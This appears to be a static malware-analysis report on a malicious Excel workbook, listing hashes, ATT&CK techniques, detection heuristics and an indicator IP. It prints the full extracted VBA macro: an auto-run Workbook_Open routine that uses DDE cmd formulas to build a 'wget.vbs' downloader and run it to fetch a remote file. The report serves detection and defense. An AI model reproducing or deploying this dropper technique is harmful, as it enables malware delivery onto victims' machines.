Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d65c88b94d838ce6…

MALICIOUS

Office (OOXML)

Size: 22.6 KB | Created: 2015-06-05 18:17:20 UTC | Authoring application: Microsoft Excel 16.0300 | First seen: 2019-06-27
MD5: c66857a9be0a738acfd4c5faedbe0955
SHA-1: 5a51f73549de2ae57d760e3b74a8632c13d4bc33
SHA-256: d65c88b94d838ce673a8e814edea6508a003d42debbefc47f15bce3fc8b5aef4
Risk Score: 170

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic | T1204.002 Malicious File | T1105 Ingress Tool Transfer

The OOXML file contains a Workbook_Open VBA macro that writes DDE-style cell formulas (=cmd|'...'!'A1') to execute shell commands. These commands assemble a 'wget.vbs' downloader script line by line through 'echo' redirection, then use 'cscript' to run it; the script downloads a file from 'http://180.148.84.85/test.txt' and saves it as 'test.txt'. This indicates downloader or dropper functionality, aiming to fetch and execute further malicious content.

Heuristics 6

  • Spreadsheet DDE link launches a dangerous command [critical] OOXML_SPREADSHEET_DDE_MALICIOUS
    Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.
  • VBA project inside OOXML [medium] (3 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'"
    ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'"
    ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'"
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Private Sub Workbook_Open()
    Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14"
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://180.148.84.85/test.txt — In document text (OOXML body / shared strings)
    URL: http:///test.txt — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2988 bytes
SHA-256: 80da8d74fcfa3746c365a0e52a5a33a192e830c0fdf876fefcc4add1fa699ecc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private Sub Workbook_Open()
Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14"
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_Open()

ActiveCell.FormulaR1C1 = "=cmd|'/C echo strUrl = WScript.Arguments.Item(0) > wget.vbs && echo StrFile = WScript.Arguments.Item(1) >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo http.Open ""GET"",strURL,False >> wget.vbs && echo http.Send >> wget.vbs && echo varByteArray = http.ResponseBody >> wget.vbs && echo Set http = Nothing >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set fs = CreateObject(""Scripting.FileSystemObject"") >> wget.vbs && echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs && echo strData = "" >> wget.vbs && echo strBuffer = "" >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs && echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs && echo Next >> wget.vbs && echo ts.Close >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C cscript wget.vbs http:///test.txt test.txt '!'A1'"
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
Sub test()
Attribute test.VB_ProcData.VB_Invoke_Func = "j\n14"
s


End Sub

Attribute VB_Name = "Module3"
Sub testest()
Attribute testest.VB_ProcData.VB_Invoke_Func = " \n14"
'
' testest Macro
'

'
    Range("J18").Select
    ActiveCell.FormulaR1C1 = "asd"
    Range("K18").Select
    ActiveCell.FormulaR1C1 = "asd"
    Range("K19").Select
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 41984 bytes
SHA-256: d4d745a79c0fba985ce214a37a687b93ca88b7754d42146d23f219cd68fa5c9d